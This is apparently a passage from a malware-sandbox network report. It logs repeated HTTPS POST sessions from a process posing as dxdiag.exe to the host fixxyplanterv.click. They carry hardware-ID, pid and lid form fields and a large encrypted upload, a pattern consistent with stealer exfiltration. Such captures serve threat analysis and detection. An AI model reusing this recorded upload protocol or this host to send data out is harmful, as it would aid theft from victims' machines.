kLjLQ4BSfxHmWTf+/ieOWo9+Mt35uijbZ/OyTJTZwNbi3yy3Y3JekAdYpQnNB17Kfm5SuQlazC8GdaNs9Np1JubeLBbVd1sF4ggw/It22r/qK7fI2VusKxJBB2hw61QGkLjLQ4BSfxHmWTDv/BWtWY5fYykdL0k7ZpQmvBVZoDZnWN3XYaZr9OR59P3/Bt+uvX+zuew/KV+WgsUqBN7QModerBeEIi9k4qzBOKoii89qLqcoaV9MKudUwkk037A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49728	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:13 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GCRSQKWBECOUZEBTXP7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12863 Host: fixxyplanterv.click
2025-01-13 07:29:13 UTC	12863	OUT	Data Raw: 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 Data Ascii: --GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="pid"2--GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="lid"ZqchOa--ne
2025-01-13 07:29:14 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=it75g1p2hg80i539dasrgp9i2e; expires=Fri, 09 May 2025 01:15:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rALwIWhAZ0mVIHp68ogMS643f3b2J2J1bl8DbNQFnr4zJTRpsHwPhDPBxXSKjGz5wyH1bEX9TX%2BdO5R%2BRQgoVRHLodOhdv1JZOarl0ZiSA%2Bs26RskmtV46%2FXDCvhSdIvnsuYuSCi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013ac8ebba00ca0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1464&rtt_var=568&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13807&delivery_rate=1893644&cwnd=239&unsent_bytes=0&cid=0d20e462d1a2de4a&ts=557&x=0"
2025-01-13 07:29:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:29:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49734	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:15 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0B0BRVQPHOX7M5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15079 Host: fixxyplanterv.click
2025-01-13 07:29:15 UTC	15079	OUT	Data Raw: 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f Data Ascii: --0B0BRVQPHOX7M5Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--0B0BRVQPHOX7M5Content-Disposition: form-data; name="pid"2--0B0BRVQPHOX7M5Content-Disposition: form-data; name="lid"ZqchOa--new--0B0BRVQPHO
2025-01-13 07:29:15 UTC	1122	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ott6bngj66rcifcvsq32s1gb2h; expires=Fri, 09 May 2025 01:15:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQkF4c2Zrf5M8T7nCnbxRaKRRFC5KgP2vsHq7XMoAXTuX7Ve3IGjI6ov0BggZ08qQTbDKw4hEav1fSfor2CVsEqXUSHJJ1LrJwRQCjZkNne9MVc46NLOHCOCGdbvLEgPi9CZADb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013ac95ffb843b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1595&rtt_var=614&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16018&delivery_rate=1759036&cwnd=203&unsent_bytes=0&cid=97fa643e86d2defa&ts=525&x=0"
2025-01-13 07:29:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:29:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49741	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:16 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6KL9F4AUEF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19913 Host: fixxyplanterv.click
2025-01-13 07:29:16 UTC	15331	OUT	Data Raw: 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --6KL9F4AUEFContent-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--6KL9F4AUEFContent-Disposition: form-data; name="pid"3--6KL9F4AUEFContent-Disposition: form-data; name="lid"ZqchOa--new--6KL9F4AUEFContent-Di
2025-01-13 07:29:16 UTC	4582	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e Data Ascii: 2+?2+?o?Mp5p_oI
2025-01-13 07:29:16 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e4v41foi1dmvfo2fce6sg39dp1; expires=Fri, 09 May 2025 01:15:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpHt%2FPUosvumAFWOS0QPQhjHuHvSeH53927%2BiTy%2FahMz4EpUSikNBPWy2c9MRPqyyDEFPXsEOacUpSzNxqiUlwyCU2bUTLHhM%2FJC3BAUQJQCxMvrZSET5DmgptcycF534imQLZKj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013ac9d7b640f85-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1613&rtt_var=617&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20870&delivery_rate=1754807&cwnd=204&unsent_bytes=0&cid=d92672dfd1494d46&ts=617&x=0"
2025-01-13 07:29:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:29:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49753	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:18 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HC6MUG7SIZ2ZMC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1208 Host: fixxyplanterv.click
2025-01-13 07:29:18 UTC	1208	OUT	Data Raw: 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a Data Ascii: --HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="pid"1--HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="lid"ZqchOa--new--HC6MUG7SIZ
2025-01-13 07:29:18 UTC	1126	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9f85t0h5u8ce551o0odc5gec42; expires=Fri, 09 May 2025 01:15:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IhLUKLjPuiptFGqcQ7ONDTyvC9NLqhATnKmQG%2FSnqrVopPcOsWTHXJDQ7MMJdroqagWniwSfalv4Ao2kMxwrMR3RD724EXNyrOLKQeaJf0%2BDQNyvon5PTGBXpmiPJvY%2F7zcREXBQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013aca7d8177d24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1802&rtt_var=677&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2124&delivery_rate=1620421&cwnd=193&unsent_bytes=0&cid=a50b57cb4b976d7f&ts=442&x=0"
2025-01-13 07:29:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:29:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49765	172.67.134.197	443	1708	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:29:19 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1T0PER0JZ2WX3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552115 Host: fixxyplanterv.click
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 Data Ascii: --1T0PER0JZ2WX3Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--1T0PER0JZ2WX3Content-Disposition: form-data; name="pid"1--1T0PER0JZ2WX3Content-Disposition: form-data; name="lid"ZqchOa--new--1T0PER0JZ2WX3
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: d6 9e e5 1a 36 46 3e 6e 1f 90 4c fb 55 e9 36 5c 29 f8 e9 2d 32 c2 65 43 c4 04 ee a7 d9 b9 1c cf a8 3f 59 b1 e6 fb 63 53 a5 1b 2c e7 74 9a 29 7e 49 61 97 7e f1 36 a9 b6 4a 68 2f 80 1b 13 bd 09 53 06 52 82 57 a3 9a ab 35 11 33 85 8d d0 e6 25 30 8b dc 1a 8d 22 76 b6 36 08 ab 9f 74 49 ca 2c 9a f6 cb 1a f5 a5 d4 3d 5c 39 f9 f9 04 48 4e 0f e3 52 9f 83 be 67 45 ba 0d 32 ee 81 05 ae fa 58 35 fa ac 24 f8 ce 2e e5 fc 3b c7 5a b7 d2 03 af 78 97 f4 ca c0 6b fe 4d c5 46 58 fe 34 df a6 a6 3c ba 4b 0b ae 0d d8 17 0d 31 d0 ac 99 a4 5a 9d 11 42 be 1d d8 fc 8d 32 25 81 67 f3 17 2e b0 9f 8f 75 4e 18 68 7e 53 ae 67 a3 1a b7 23 e6 7f 96 4d 79 a9 a4 94 d2 2a 3f 5b b6 83 a5 d0 ee fe 77 c7 19 49 e8 2b f7 39 ce 7a 6f 87 5e 4b 2d 0c 16 14 ff df ed 93 0b 57 98 13 87 95 a5 4c 40 72 Data Ascii: 6F>nLU6\)-2eC?YcS,t)~Ia~6Jh/SRW53%0"v6tI,=\9HNRgE2X5$.;ZxkMFX4<K1ZB2%g.uNh~Sg#My*?[wI+9zo^K-WL@r
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: fa 42 5d 1f ab 3a 42 2b 36 9c 2d 19 1a d4 fa c2 f3 a4 02 71 20 24 66 fa fb d7 2c 0f e0 50 60 1f 11 d1 47 3c 6b 2c e1 21 d0 94 42 c5 3c dc 0e 0e 12 5c 18 63 7e 9c 0b fb 24 c7 b3 ed 96 fb cd 4e 1b 1a 11 7b e5 40 28 c4 4a 2a bf b1 d0 36 64 bc 88 25 2a 06 c7 68 b4 ee 91 b9 04 2c de ec f8 ce 1f 9e d6 ef fe 60 dc 5e bb 61 34 5d dc 6d fb dc d6 e3 ab c6 74 2d ab a5 f6 8d cf 90 86 0a 8d 8c 85 bb 07 59 2a d3 8c bc 2a ed 6a 7a 7d f4 f7 bc a0 79 e7 e9 a7 8e 69 4f 83 47 a4 c5 df 58 d9 fa 5a 6d d7 da 6c 5d 47 50 46 69 8d 9f c4 1d f7 bd 89 21 b5 c7 81 99 01 c5 08 37 0c 03 e2 da 89 52 dd e7 fa ec cd d7 92 ac 55 b0 a4 8b 5b 18 ba 8d 06 c3 92 00 04 06 fc 0b 68 82 93 69 1a f6 60 a9 a1 45 c5 55 1b fc aa fc bd be 04 91 7b 30 15 49 61 1d 40 0f b7 c0 55 e0 f6 2f 9a f6 4d 84 8a Data Ascii: B]:B+6-q $f,P`G<k,!B<\c~$N{@(J6d%h,`^a4]mt-Y**jz}yiOGXZml]GPFi!7RU[hi`EU{0Ia@U/M
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: 40 a2 bf ff ad 7b 59 88 43 91 c8 9e 4b 8a c3 ea df 00 61 2f d1 12 f3 12 4b fc 32 29 b7 c0 0d ce fc 84 96 bc 76 09 c5 95 73 43 3b 44 58 3f 82 da 60 a4 27 06 28 f7 9d 98 9b 2a b2 d4 9b 4b 2a 5a 45 a2 73 fc f2 cb 70 92 a1 c1 c2 37 bc 5b a9 00 6d 1f c6 ba ff 3b 2a c6 99 97 39 b5 91 79 38 ff f5 7a 77 2b 70 f1 7c 2b 01 c2 8b 4e 85 2f b5 e7 fd ca b8 77 a3 8d 6d db 29 60 db ef c9 96 ed 49 11 32 4e 36 9a 8a 74 36 24 c9 64 c9 17 95 00 56 59 e4 45 5f dc a6 91 d0 c2 74 f9 82 a2 c4 29 19 0b 9b 10 4f 9e 43 39 2d 13 20 17 9f 1f 8f e0 37 8e 25 cd 6e 9f 7e b3 8f 53 8b 2a 6d f7 04 cf 68 5f 1b b3 73 83 12 bb 7d 08 dc 78 ae 2a 13 ae 34 42 3f ab af 89 ca 5a 2c 3e 44 2b 97 60 29 8a ec 59 6b 78 44 bc 30 c9 7d a7 35 e9 ae 41 90 7c db 56 6f df b6 ce df 46 a1 ee 67 bd 2d a6 0c 88 Data Ascii: @{YCKa/K2)vsC;DX?`'(KZEsp7[m;9y8zw+p\|+N/wm)`I2N6t6$dVYE_t)OC9- 7%n~Smh_s}x*4B?Z,>D+`)YkxD0}5A\|VoFg-
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: 74 da bc 74 ad 35 9e e4 0e 1b d4 64 4e 47 3f aa 43 42 3e 0f cf dc 20 91 5a af cd 47 4e f6 4a 68 91 6c 48 f4 e4 14 11 b6 48 ed d9 05 4c c0 6b ff 08 ea f4 9e d9 87 5a c2 a6 06 6b bd 37 05 37 77 5a 77 8f 77 3a 77 e8 25 82 60 ab 54 98 ad cc 6d f8 86 48 2e 39 36 64 e1 10 71 b4 c5 a1 71 37 88 d2 97 6a dd da a9 36 a7 80 58 d6 85 fe c4 fe e9 97 3a e0 47 6f 43 8c 2a e7 bd 8c 52 53 6c c2 33 d5 45 5f 9e e4 d8 2c da b7 48 7d 26 a9 5d 9f fd f9 4f 21 35 e3 25 6a cd fa 5d c7 0d cb 94 52 d1 f4 f6 86 12 de f9 34 ea d4 15 bb c4 79 3f 5e 43 de 5e a9 40 eb 80 48 ca 32 71 d5 ab 44 7f 7b e2 f2 15 de bd ab 55 03 c1 03 67 67 60 bf 3b fd 25 1c f3 9c aa 09 e1 29 18 51 02 f7 26 09 69 10 d0 ff 1e ee 7a 3a eb 8c e4 41 93 1e b4 4b 95 4f ad 2e c2 b4 b5 37 07 ce c8 37 e6 bd 9e a7 3f ea Data Ascii: tt5dNG?CB> ZGNJhlHHLkZk77wZww:w%`TmH.96dqq7j6X:GoC*RSl3E_,H}&]O!5%j]R4y?^C^@H2qD{Ugg`;%)Q&iz:AKO.77?
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: 59 24 e2 74 dc 83 a3 37 6e f4 22 00 e9 aa d6 bd 21 ca 31 55 e2 64 09 9b c2 6c 65 82 43 81 2c d8 3a 30 1c 03 e5 0a 80 2f d9 5d 45 ab e9 90 be 33 60 89 93 92 d0 a8 dc b4 46 10 2b 2f 0a e4 ff bc c4 c9 03 59 66 ec 93 9f b1 53 38 d8 ac 1d 07 f2 f5 51 d1 c9 56 06 0e a5 42 81 43 11 b9 69 7c d1 c8 61 34 66 d6 ba 86 36 47 5a b0 85 1b 79 88 9d 80 8d ed 3c f0 31 5f a3 da e5 2c f2 82 00 fc cb 32 b7 36 b9 ea 12 a7 e4 23 f6 34 5d 58 ec b2 40 cc f7 d1 9d 33 97 9f 59 ca f7 5e 98 b2 47 c7 f2 66 34 4d a9 99 b2 fa e9 1a 98 ff bc 56 f7 de 04 3e f6 03 a2 c9 ad a0 6e b6 ae f1 9a cb 20 de 1d 0b 6f 64 f7 dd 73 3f 30 2a 07 47 2a 92 ce 00 64 82 57 5c 0c e4 72 af fa 8d 8d 7d 20 5d 25 92 4e 50 28 72 c8 2e ec b8 28 88 39 b4 db 0a 4f 46 28 2a d5 4e c3 7a 15 f5 8d 5a d3 41 8a 9e 29 6f Data Ascii: Y$t7n"!1UdleC,:0/]E3`F+/YfS8QVBCi\|a4f6GZy<1_,26#4]X@3Y^Gf4MV>n ods?0GdW\r} ]%NP(r.(9OF(*NzZA)o
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: 71 89 b1 4d 59 a7 58 78 05 35 fd 39 b3 52 94 fb 6a 32 89 22 a5 ad f1 4b 54 bb 20 81 13 dd f5 6d de d8 32 d8 52 10 ac cd d5 6c 35 78 65 b9 a5 55 99 84 52 84 80 93 94 b6 ed e2 07 08 07 d1 7b fe 6f 45 68 f8 8e 5f 57 f8 e9 43 5d b2 46 f9 55 eb 3b 8e 95 ba 9d 9f 10 58 d8 2a c4 84 58 13 37 1b c8 ba 78 6c 11 bc 53 79 ce 14 17 19 a3 79 8d 48 6c 6a 65 dc 83 fd 6e 71 a0 fd 7f 6b 05 65 25 50 dc f7 89 46 01 63 b4 2a 44 0d 3c 43 77 81 13 22 a9 7c db df c6 68 29 bc c9 fb 91 94 c7 53 f8 d1 d7 58 9b cc f4 a7 f0 70 08 e4 e4 e3 bf 88 b0 4a 00 e3 07 e3 db 20 39 f0 8d 02 1f 62 2d ae 7a ea 01 e1 07 b3 40 cc 9e 5a d2 6c 6e 45 08 3e 5f 16 8d 2e e4 ca 5c 88 1b 50 4f c3 32 08 08 b7 ae a0 32 2f 9a 9c 63 a8 01 2a 91 31 83 2e 7e e4 2c c3 bb 6f f0 5c 61 12 0a 69 be bb 4f 09 fd db 13 Data Ascii: qMYXx59Rj2"KT m2Rl5xeUR{oEh_WC]FU;XX7xlSyyHljenqke%PFcD<Cw"\|h)SXpJ 9b-z@ZlnE>_.\PO22/c*1.~,o\aiO
2025-01-13 07:29:19 UTC	15331	OUT	Data Raw: f0 44 89 4d 82 cf b6 1d 33 f3 43 f5 5d e7 29 b8 99 2a ea 1f 21 b3 5d 43 b7 5e d8 15 1a b0 f3 cc b1 41 5c d4 b0 e8 ef d7 91 d8 26 1e 87 f5 4a 08 d7 dd c7 48 13 0f 06 3f a0 85 43 63 56 c9 dc 86 29 32 5c 1c 8c 39 2e bc 8b c5 32 98 cf f9 e6 45 ff 1e c8 83 4f e7 d6 70 de 8b 2c 65 d9 27 52 35 74 95 12 bd e9 b2 36 5f 0d b8 25 be b7 64 85 25 2a f4 3e b6 bd 6d b5 c8 87 d3 fd c5 4d 2e f2 ee 24 ee e7 86 cf cd c5 8d e8 a5 36 79 85 ea da ed a2 6d af 93 c4 8f 07 d4 f1 91 54 e0 1f 11 ac ca ab f8 5a 86 d1 21 62 4b 33 69 8c d2 ae cc 25 16 f0 e1 fa 2f ba 18 fa 93 6e 42 38 aa 8c 83 7f b6 b3 53 0c 56 c8 d6 c8 52 32 87 a8 99 eb d4 36 f1 1a 1f b4 0f 10 11 81 2e e2 f2 91 53 4a ed a9 d8 de 55 d9 fe 88 ed b2 07 01 8b 13 bb e8 a7 91 4c 14 63 e4 9a c6 7e 09 e2 f7 e7 d6 79 27 0a 55 Data Ascii: DM3C])!]C^A\&JH?CcV)2\9.2EOp,e'R5t6_%d%>mM.$6ymTZ!bK3i%/nB8SVR26.SJULc~y'U
